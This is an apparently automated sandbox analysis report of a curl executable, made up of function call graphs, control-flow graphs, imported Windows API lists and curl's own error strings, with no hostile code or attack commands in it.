41027 86e407 17 API calls 2 library calls 40964->41027 41028 872362 10 API calls 40964->41028 41029 877276 108 API calls 40964->41029 41030 87201d 14 API calls 40964->41030 41031 869327 40964->41031 41132 86920d free 40964->41132 41135 86c5d3 73 API calls 40964->41135 40966 8702da GetTickCount 40965->40966 40967 87028a QueryPerformanceCounter 40965->40967 40968 8702ac __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40966->40968 40967->40968 40968->40944 40970 876bc3 calloc 40969->40970 40971 876bd1 40970->40971 40972 86c775 40970->40972 41136 888f8c 60 API calls 40971->41136 40972->40947 40985 86c5d3 73 API calls 40972->40985 40974 876c0c 40975 876c64 40974->40975 41137 88e990 40974->41137 41142 876aa3 free 40975->41142 40978 876c47 WSACreateEvent 40978->40972 40978->40975 40979 876c6c 41143 88d032 40979->41143 40982 88d032 free 40984 876c7f free 40982->40984 40984->40972 40985->40964 40987 877668 40986->40987 40994 877654 40986->40994 41179 8b0ca6 40987->41179 40989 8776e1 41147 8791a5 40989->41147 40990 87795f 40990->40964 40992 87752d 19 API calls 40992->40994 40994->40987 40994->40989 40994->40992 40995 877716 malloc 41001 877735 40995->41001 41002 87773c 40995->41002 40996 877866 WSAWaitForMultipleEvents 40997 87791f WSAResetEvent 40996->40997 41011 87788c 40996->41011 40997->40987 41000 877934 free 40997->41000 41000->40987 41001->40987 41005 877743 41002->41005 41004 87752d 19 API calls 41004->41011 41005->40996 41007 8777d7 send 41005->41007 41008 87780f WSAEventSelect 41005->41008 41010 87784d 41005->41010 41155 87752d 41005->41155 41006 8778da WSAEnumNetworkEvents WSAEventSelect 41006->41011 41007->41008 41008->41005 41009 877894 41008->41009 41009->41011 41014 8778b1 free 41009->41014 41010->40996 41159 88f35e 41010->41159 41011->40997 41011->41004 41011->41006 41014->41011 41016 89480b 2 API calls 41015->41016 41021 878a50 41015->41021 41016->41021 41017 8b0ca6 _ValidateLocalCookies 5 API calls 41018 878b06 41017->41018 41018->40964 41024 878a9f 41021->41024 41026 878a77 41021->41026 41195 877b97 41021->41195 41022 878ade 41022->41026 41207 87927c 7 API calls 41022->41207 41024->41022 41205 88cc72 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41024->41205 41206 878fae IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41024->41206 41026->41017 41027->40964 41028->40964 41029->40964 41030->40964 41032 869354 41031->41032 41127 869998 41031->41127 41033 869383 41032->41033 41034 869371 _close 41032->41034 41032->41127 41035 8693e1 41033->41035 41037 86939c 41033->41037 41034->41033 41045 86942b 41035->41045 41404 872362 10 API calls 41035->41404 41044 872119 14 API calls 41037->41044 41038 869423 41040 8694cc 41038->41040 41043 86949f fflush 41038->41043 41039 8693fd 41042 869409 41039->41042 41039->41045 41050 87027a 2 API calls 41040->41050 41062 8694f0 41040->41062 41130 86975c 41040->41130 41041 869451 41041->41038 41405 872362 10 API calls 41041->41405 41042->41038 41052 872119 14 API calls 41042->41052 41043->41040 41046 8694ad 41043->41046 41048 8693bd 41044->41048 41045->41038 41045->41041 41049 869446 _fileno 41045->41049 41046->41040 41058 872119 14 API calls 41046->41058 41047 86977d 41057 869789 fclose 41047->41057 41063 8697e0 41047->41063 41048->41038 41054 8693c9 fputs 41048->41054 41049->41041 41050->41062 41052->41038 41053 86976d fputs 41053->41047 41054->41038 41055 869475 41055->41038 41406 861fdc 41055->41406 41056 869a7d 41060 869a92 41056->41060 41448 870637 32 API calls ___from_strstr_to_strchr 41056->41448 41059 869797 41057->41059 41066 8697b6 41057->41066 41058->41040 41059->41063 41059->41066 41067 872119 14 API calls 41059->41067 41065 869aae 41060->41065 41070 869aa6 fclose 41060->41070 41073 869553 41062->41073 41079 869583 41062->41079 41100 869568 41062->41100 41062->41130 41063->41056 41443 872362 10 API calls 41063->41443 41072 869ab7 free 41065->41072 41082 869acb 41065->41082 41066->41063 41442 86911d 20 API calls 41066->41442 41067->41066 41068 869897 41445 86913e 20 API calls 41068->41445 41069 8695e7 41438 872362 10 API calls 41069->41438 41070->41065 41072->41082 41435 872362 10 API calls 41073->41435 41078 869595 41436 872362 10 API calls 41078->41436 41079->41069 41079->41078 41080 8697d5 _unlink 41080->41063 41081 869ae6 41087 869b03 41081->41087 41088 869aef free 41081->41088 41082->41081 41086 869ade fclose 41082->41086 41084 869820 41084->41056 41090 869841 _strdup 41084->41090 41086->41081 41092 869b15 41087->41092 41449 8816ca 266 API calls 41087->41449 41088->41087 41089 8695fc 41089->41100 41439 872362 10 API calls 41089->41439 41095 8699d4 CreateFileA 41090->41095 41096 86985d 41090->41096 41091 8695aa 41437 872362 10 API calls 41091->41437 41097 869b24 free free free 41092->41097 41098 869b1b free 41092->41098 41101 8699f3 free 41095->41101 41102 8699fb 41095->41102 41096->41095 41103 86986d 41096->41103 41097->41127 41098->41097 41100->41068 41100->41130 41440 872362 10 API calls 41100->41440 41101->41102 41106 869a60 GetLastError 41102->41106 41107 869a01 41102->41107 41444 86913e 20 API calls 41103->41444 41104 8698c3 41111 869926 fflush _fileno _get_osfhandle _lseeki64 41104->41111 41113 872119 14 API calls 41104->41113 41104->41127 41105 8696a4 41105->41068 41112 87027a 2 API calls 41105->41112 41447 86913e 20 API calls 41106->41447 41115 869a1e SetFileTime 41107->41115 41109 86987c 41109->41056 41116 86988a free 41109->41116 41114 86995f 41111->41114 41129 869989 41111->41129 41131 8696f2 41112->41131 41120 869920 41113->41120 41121 869965 SetEndOfFile 41114->41121 41114->41129 41118 869a55 CloseHandle 41115->41118 41119 869a38 GetLastError 41115->41119 41116->41056 41117 869a7a 41117->41056 41118->41056 41446 86913e 20 API calls 41119->41446 41120->41111 41122 869972 fseek 41121->41122 41121->41129 41122->41127 41122->41129 41124 869749 41441 86913e 20 API calls 41124->41441 41125 869a52 41125->41118 41126 872119 14 API calls 41126->41127 41127->40964 41129->41126 41129->41127 41130->41047 41130->41053 41131->41068 41131->41124 41132->40964 41133->40949 41134->40947 41135->40964 41136->40974 41138 88e99e socket 41137->41138 41139 88e994 41137->41139 41140 88e9ba 41138->41140 41141 88e9b1 closesocket 41138->41141 41139->40978 41140->40978 41141->41140 41142->40979 41144 876c74 41143->41144 41145 88d03b 41143->41145 41144->40982 41144->40984 41146 88d06b free 41145->41146 41146->41144 41148 8791d0 41147->41148 41149 8791c8 41147->41149 41148->41149 41186 89480b 41148->41186 41151 8b0ca6 _ValidateLocalCookies 5 API calls 41149->41151 41153 8776f4 41151->41153 41152 8791e3 41190 88ca76 5 API calls _ValidateLocalCookies 41152->41190 41153->40995 41153->41005 41156 877539 41155->41156 41158 87755b 41155->41158 41156->41158 41191 888e57 19 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41156->41191 41158->41005 41160 88f384 41159->41160 41161 88f397 41159->41161 41160->41161 41163 88f3b3 41160->41163 41192 88f1f3 WSASetLastError Sleep 41161->41192 41166 88f514 41163->41166 41168 88f501 WSASetLastError 41163->41168 41164 88f3a2 41175 88f3a4 41164->41175 41165 8b0ca6 _ValidateLocalCookies 5 API calls 41167 877860 41165->41167 41169 88f520 41166->41169 41173 88f532 __aulldvrm 41166->41173 41167->40996 41167->41011 41168->41175 41193 88f1f3 WSASetLastError Sleep 41169->41193 41170 88f5b0 select 41178 88f5ef 41170->41178 41172 88f52b 41172->41178 41173->41170 41174 88f619 __WSAFDIsSet 41176 88f651 __WSAFDIsSet 41174->41176 41174->41178 41175->41165 41177 88f66f __WSAFDIsSet 41176->41177 41176->41178 41177->41178 41178->41174 41178->41175 41178->41176 41178->41177 41180 8b0caf IsProcessorFeaturePresent 41179->41180 41181 8b0cae 41179->41181 41183 8b0cf1 41180->41183 41181->40990 41194 8b0cb4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41183->41194 41185 8b0dd4 41185->40990 41187 89481c QueryPerformanceCounter 41186->41187 41188 894873 GetTickCount 41186->41188 41189 89483e __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41187->41189 41188->41189 41189->41152 41190->41149 41191->41158 41192->41164 41193->41172 41194->41185 41196 877bc8 41195->41196 41201 8789ca 41195->41201 41196->41201 41203 877bf1 41196->41203 41216 876f2d 41196->41216 41198 8795e3 19 API calls 41198->41203 41201->41021 41203->41198 41203->41201 41208 890211 41203->41208 41253 877961 102 API calls 41203->41253 41254 889e52 18 API calls 41203->41254 41255 882166 41203->41255 41205->41024 41206->41024 41207->41026 41209 89480b 2 API calls 41208->41209 41212 890229 41209->41212 41210 89035a 41214 8902d4 41210->41214 41269 88fd8c 41210->41269 41212->41210 41213 8902c5 41212->41213 41212->41214 41213->41214 41297 87d6ad 17 API calls _ValidateLocalCookies 41213->41297 41214->41203 41218 876f61 41216->41218 41235 877057 41216->41235 41217 876f7c 41362 888afd 41217->41362 41218->41217 41219 876f70 41218->41219 41361 888ca8 45 API calls 41219->41361 41221 8b0ca6 _ValidateLocalCookies 5 API calls 41224 877075 41221->41224 41223 876f79 free 41226 876fb9 free 41223->41226 41224->41203 41227 876fd1 41226->41227 41228 87701b 41227->41228 41342 88f6ce 41227->41342 41347 8795e3 41228->41347 41231 877035 41351 877405 41231->41351 41233 87704f 41234 87708c 41233->41234 41233->41235 41377 88ec6b free free 41233->41377 41355 88e3eb 41234->41355 41235->41221 41240 8770c3 41242 8770e2 41240->41242 41378 87d126 free 41240->41378 41243 8771de 41242->41243 41244 877147 41242->41244 41246 882166 82 API calls 41243->41246 41379 87201d 14 API calls 41244->41379 41248 8771d0 free 41246->41248 41247 877198 41380 88935c 84 API calls 41247->41380 41248->41235 41250 8771b4 41250->41248 41381 87d632 41250->41381 41253->41203 41254->41203 41256 88217e 41255->41256 41257 8821f5 41256->41257 41258 88218e 41256->41258 41403 88ec6b free free 41256->41403 41257->41203 41402 8a0ff1 8 API calls 41258->41402 41261 882199 41262 8a2f3f 7 API calls 41261->41262 41263 8821a0 41262->41263 41264 881e1f 33 API calls 41263->41264 41265 8821e7 41264->41265 41266 877405 18 API calls 41265->41266 41267 8821ee 41266->41267 41268 881ef9 36 API calls 41267->41268 41268->41257 41270 88fde4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41269->41270 41271 88fe18 41270->41271 41273 872119 14 API calls 41270->41273 41275 88fe2b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41270->41275 41298 872119 41271->41298 41273->41271 41301 86e2dd 41275->41301 41277 86e2dd 14 API calls 41278 890056 41277->41278 41279 86e2dd 14 API calls 41278->41279 41283 890064 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41279->41283 41282 86e127 14 API calls 41284 890171 41282->41284 41311 86e127 41283->41311 41285 86e127 14 API calls 41284->41285 41286 890189 41285->41286 41287 86e127 14 API calls 41286->41287 41288 8901a1 41287->41288 41289 86e127 14 API calls 41288->41289 41290 8901bf 41289->41290 41291 86e127 14 API calls 41290->41291 41292 8901d6 41291->41292 41293 872119 14 API calls 41292->41293 41294 8901f2 fflush 41293->41294 41295 8b0ca6 _ValidateLocalCookies 5 API calls 41294->41295 41296 89020f 41295->41296 41296->41214 41297->41214 41318 871535 41298->41318 41303 86e2f7 __aulldiv 41301->41303 41302 86e392 __aulldiv 41304 86e3ee 41302->41304 41307 86e3b4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41302->41307 41303->41302 41306 86e2fd 41303->41306 41309 86e32c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41303->41309 41339 87201d 14 API calls 41304->41339 41306->41277 41338 87201d 14 API calls 41307->41338 41337 87201d 14 API calls 41309->41337 41312 86e13b 41311->41312 41314 86e145 41312->41314 41316 86e180 __aulldiv 41312->41316 41341 87201d 14 API calls 41314->41341 41315 86e1fc 41315->41282 41340 87201d 14 API calls 41316->41340 41328 870f87 41318->41328 41320 8b0ca6 _ValidateLocalCookies 5 API calls 41321 871fa2 41320->41321 41321->41275 41322 8715d6 fputc 41324 871589 __aulldvrm 41322->41324 41327 87158f 41322->41327 41323 871616 fputc 41323->41324 41323->41327 41324->41322 41324->41323 41325 87201d 12 API calls 41324->41325 41324->41327 41336 870e54 __stdio_common_vsprintf 41324->41336 41325->41324 41327->41320 41331 871430 41328->41331 41334 870fa9 41328->41334 41329 870eda strncmp strncmp 41329->41334 41330 871008 strncmp 41332 871026 strncmp 41330->41332 41330->41334 41331->41324 41332->41334 41333 87115a strtol 41333->41334 41334->41329 41334->41330 41334->41331 41334->41333 41335 871122 strtol 41334->41335 41335->41334 41336->41324 41337->41306 41338->41306 41339->41306 41340->41315 41341->41315 41343 890211 20 API calls 41342->41343 41345 88f6e4 41343->41345 41344 88f709 41344->41228 41345->41344 41346 872119 14 API calls 41345->41346 41346->41344 41348 879615 41347->41348 41349 8795ef 41347->41349 41348->41231 41394 87941d 19 API calls 2 library calls 41349->41394 41352 877411 41351->41352 41354 877416 41351->41354 41395 889e52 18 API calls 41352->41395 41354->41233 41356 88e44e 41355->41356 41360 88e407 41355->41360 41357 8b0ca6 _ValidateLocalCookies 5 API calls 41356->41357 41359 877096 free 41357->41359 41358 88e41d _time64 41358->41356 41359->41240 41359->41242 41360->41356 41360->41358 41361->41223 41363 888b0e EnterCriticalSection LeaveCriticalSection 41362->41363 41364 888b80 free 41362->41364 41365 888b3a CloseHandle 41363->41365 41366 888b44 41363->41366 41364->41223 41367 888b6c 41365->41367 41368 888b49 41366->41368 41369 888b50 41366->41369 41398 878f25 free 41367->41398 41396 8a697a WaitForSingleObjectEx CloseHandle 41368->41396 41397 88887e DeleteCriticalSection free free closesocket free 41369->41397 41374 888b58 free 41374->41367 41375 888b79 closesocket 41375->41364 41377->41234 41378->41240 41379->41247 41380->41250 41382 87d64d 41381->41382 41383 87d69a 41381->41383 41382->41383 41399 871fd4 14 API calls 41382->41399 41384 8b0ca6 _ValidateLocalCookies 5 API calls 41383->41384 41385 87d6a5 41384->41385 41385->41248 41387 87d66d 41388 87d6a7 41387->41388 41389 87d67f 41387->41389 41401 8b0dd6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 41388->41401 41400 87dc17 fwrite fwrite 41389->41400 41392 87d698 41392->41383 41393 87d6ac 41394->41348 41395->41354 41396->41369 41397->41374 41398->41375 41399->41387 41400->41392 41401->41393 41403->41258 41404->41039 41405->41055 41407 862005 41406->41407 41408 86221b 41406->41408 41407->41408 41412 86200d 41407->41412 41456 86913e 20 API calls 41408->41456 41410 862041 41410->41038 41411 8621b6 fopen 41413 8621f5 free 41411->41413 41414 8621cb strerror 41411->41414 41412->41411 41415 862067 41412->41415 41417 862034 41412->41417 41413->41410 41455 86913e 20 API calls 41414->41455 41425 862090 41415->41425 41451 870b16 _open 41415->41451 41450 869199 20 API calls 41417->41450 41420 862191 41420->41414 41423 862196 _fdopen 41420->41423 41422 8621e9 free 41422->41410 41423->41413 41424 8621aa _close 41423->41424 41424->41414 41425->41420 41425->41423 41425->41425 41426 8620dc malloc 41425->41426 41427 8620c9 free 41425->41427 41428 8620eb 41426->41428 41434 862107 41426->41434 41427->41417 41452 869199 20 API calls 41428->41452 41430 8620f8 free 41430->41410 41431 86217f 41431->41420 41434->41431 41453 87201d 14 API calls 41434->41453 41454 870b16 _open 41434->41454 41435->41100 41436->41091 41437->41100 41438->41089 41439->41100 41440->41105 41441->41130 41442->41080 41443->41084 41444->41109 41445->41104 41446->41125 41447->41117 41448->41060 41449->41092 41450->41410 41451->41415 41452->41430 41453->41434 41454->41434 41455->41422 41456->41410 43116 887d60 15 API calls _ValidateLocalCookies 43118 896d60 32 API calls 43254 86336b 6 API calls 43256 872769 17 API calls 43259 861f70 57 API calls 43261 86544b 20 API calls _ValidateLocalCookies 43263 8b1370 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 43122 8a4576 58 API calls _ValidateLocalCookies

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 562 87d33a-87d356 GetModuleHandleA 563 87d47e-87d481 562->563 564 87d35c-87d37e GetProcAddress _mbspbrk 562->564 565 87d391-87d393 564->565 566 87d380-87d382 564->566 569 87d395-87d3a5 GetProcAddress 565->569 570 87d3bf-87d3ce GetSystemDirectoryA 565->570 567 87d384-87d386 566->567 568 87d388-87d38f LoadLibraryA 566->568 571 87d3ac-87d3b6 LoadLibraryExA 567->571 572 87d3b8-87d3ba 568->572 569->570 573 87d3a7 569->573 574 87d3d4-87d3d6 570->574 575 87d47b-87d47d 570->575 571->572 572->575 573->571 576 87d3d9-87d3de 574->576 575->563 576->576 578 87d3e0-87d400 malloc 576->578 580 87d402-87d40e GetSystemDirectoryA 578->580 581 87d469-87d47a free 578->581 580->581 582 87d410-87d412 580->582 581->575 584 87d415-87d41a 582->584 584->584 585 87d41c-87d427 584->585 586 87d42a-87d42f 585->586 586->586 587 87d431-87d435 586->587 588 87d437-87d43f 587->588 588->588 589 87d441-87d446 588->589 590 87d45d-87d461 LoadLibraryA 589->590 591 87d448-87d45b 589->591 592 87d467 590->592 591->592 592->581
                                APIs
                                • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D34B
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D363
                                • _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,008B7348,?,?,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D374
                                • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(security.dll,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D389
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00894EA1,AddDllDirectory,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D39D
                                • LoadLibraryExA.KERNELBASE(?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D3B6
                                • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,00000000,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D3C1
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D3F6
                                • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,?,?,00894EA1,?,?,0087D2C2), ref: 0087D406
                                • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(00894EA1,?,?,00894EA1,?,?,0087D2C2), ref: 0087D461
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00894EA1,?,?,0087D2C2), ref: 0087D478
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: LibraryLoad$AddressDirectoryProcSystem$HandleModule_mbspbrkfreemalloc
                                • String ID: AddDllDirectory$LoadLibraryExA$kernel32$security.dll
                                • API String ID: 184734234-2138446276
                                • Opcode ID: 300462e2271d37e15cd941186eb382c9bb38604d4aa059d36a90d48bdd6c82c7
                                • Instruction ID: 525683aba53d58ddc1b6ea2debee5dbc17e666a5d97d8a6081282e4542b008a3
                                • Opcode Fuzzy Hash: 300462e2271d37e15cd941186eb382c9bb38604d4aa059d36a90d48bdd6c82c7
                                • Instruction Fuzzy Hash: AC412835A00B11ABCF155F68EC18B6E3FB5FF86B1471882A9E846E7355DB31DD028B90
                                APIs
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 008715D6
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00871616
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fputc
                                • String ID: %ld$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                • API String ID: 1992160199-2365385051
                                • Opcode ID: 021442b085b1777ba2ea7c1d77e5c5064af1f6fcd00bb5465b37fa5a2e315495
                                • Instruction ID: 28ae86bed2e9a81f373714fffd4156e153596a84824dda511bd50eb3f32a1061
                                • Opcode Fuzzy Hash: 021442b085b1777ba2ea7c1d77e5c5064af1f6fcd00bb5465b37fa5a2e315495
                                • Instruction Fuzzy Hash: 2862B2712087418FDB18CF2CD888B2ABBE1FFD5754F248A2EF599C6695CB71C8458B42
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLastrecv
                                • String ID: Recv failure: %s
                                • API String ID: 2514157807-4276829032
                                • Opcode ID: 2b44958bf51800e41d41a4f593f304823a6d203e9a6a9160d8b9d8772732f8bf
                                • Instruction ID: d1210537aa66a5233554711067c8fd45af809297337a945cb42b5966279a25bc
                                • Opcode Fuzzy Hash: 2b44958bf51800e41d41a4f593f304823a6d203e9a6a9160d8b9d8772732f8bf
                                • Instruction Fuzzy Hash: 8611B171A003089BCB109F28DC45BDA7BF4FF88320F10455DFA19D7295D770D9848B51
                                APIs
                                • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,0086D002,?,?,?,?,?,?,?,0086CD94,0086D002,?,?,?), ref: 00869374
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo,00000002,?,?,00000000,0086D002), ref: 008693D4
                                • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00869449
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 008694A2
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(008B7668,?), ref: 00869775
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 0086978C
                                • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000078,?,00000000,0086D002), ref: 008697DA
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000078,?,00000000,0086D002), ref: 00869843
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,0086D002), ref: 0086988B
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00869927
                                • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 0086993A
                                • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00869943
                                • _lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000000), ref: 00869952
                                • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,0086D002), ref: 00869968
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000002,?,?,?,?,?,?,?,00000000,0086D002), ref: 0086997C
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00869AA7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00869ABD
                                Strings
                                • More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo, xrefs: 008693CF
                                • Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u, xrefs: 00869A6D
                                • Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u, xrefs: 00869A45
                                • curl: (%d) %s, xrefs: 008693B0
                                • The Retry-After: time would make this command line exceed the maximum allowed time for retries., xrefs: 0086974C
                                • Removing output file: %s, xrefs: 008697CA
                                • Throwing away %I64d bytes, xrefs: 00869913
                                • curl: (23) Failed to truncate file, xrefs: 008699BD
                                • M', xrefs: 0086956B
                                • curl: (23) Failed seeking to end of file, xrefs: 00869991
                                • curl: (%d) The requested URL returned error: %ld, xrefs: 00869416
                                • Problem %s. Will retry in %ld seconds. %ld retries left., xrefs: 008698B3
                                • curl: (%d) Failed writing body, xrefs: 008694BF, 008697A9
                                • Failed to set filetime %I64d on outfile: overflow, xrefs: 0086986F
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _filenofclosefflushfputsfree$File_close_get_osfhandle_lseeki64_strdup_unlinkfseek
                                • String ID: Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u$Failed to set filetime %I64d on outfile: overflow$M'$More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo$Problem %s. Will retry in %ld seconds. %ld retries left.$Removing output file: %s$The Retry-After: time would make this command line exceed the maximum allowed time for retries.$Throwing away %I64d bytes$curl: (%d) %s$curl: (%d) Failed writing body$curl: (%d) The requested URL returned error: %ld$curl: (23) Failed seeking to end of file$curl: (23) Failed to truncate file
                                • API String ID: 968532693-3733868149
                                • Opcode ID: 779d9609ce787ea514aa60098b99a8f8c14d07432e5f38b3de0fc6d7803abede
                                • Instruction ID: b1aea2693c24d36758b7692310e411b19134924549020cd6820e8432032a6ef0
                                • Opcode Fuzzy Hash: 779d9609ce787ea514aa60098b99a8f8c14d07432e5f38b3de0fc6d7803abede
                                • Instruction Fuzzy Hash: 4D32BC70A00305EFDF259FA8D889BAEBBB9FF04300F154169E495E62E2DB75AD40CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 213 861fdc-861fff 214 862005-862007 213->214 215 86221b-862221 call 86913e 213->215 214->215 217 86200d-862015 214->217 220 862226-862227 215->220 218 862017-86201a 217->218 219 86204b-862054 217->219 218->219 221 86201c-862032 call 8720e6 218->221 222 8621b6-8621c9 fopen 219->222 223 86205a-86205c 219->223 224 862228 220->224 233 862046-862049 221->233 234 862034 221->234 227 8621f5-862219 free 222->227 228 8621cb-8621f3 strerror call 86913e free 222->228 229 862067-862080 call 870b16 223->229 230 86205e-862061 223->230 225 86222a-86222e 224->225 227->225 228->224 239 862082-86208e 229->239 240 862093-86209f 229->240 230->222 230->229 233->219 237 862039-862041 call 869199 234->237 237->220 239->229 249 862090 239->249 241 8620a5-8620a8 240->241 242 862191-862194 240->242 246 862196-8621a8 _fdopen 241->246 247 8620ae-8620b3 241->247 242->228 242->246 246->227 250 8621aa-8621b4 _close 246->250 251 8620b6-8620bb 247->251 249->240 250->228 251->251 252 8620bd-8620c7 251->252 253 8620dc-8620e9 malloc 252->253 254 8620c9-8620d7 free 252->254 255 862107-86211b call 8b2780 253->255 256 8620eb-862102 call 869199 free 253->256 254->237 261 86211f-862128 255->261 256->224 263 862135-862138 261->263 264 86212a-862133 261->264 265 86217f-86218d 263->265 266 86213a-862151 call 87201d 263->266 264->263 264->265 265->242 270 862152-86216d call 870b16 266->270 270->265 273 86216f-86217b 270->273 273->270 275 86217d 273->275 275->261
                                APIs
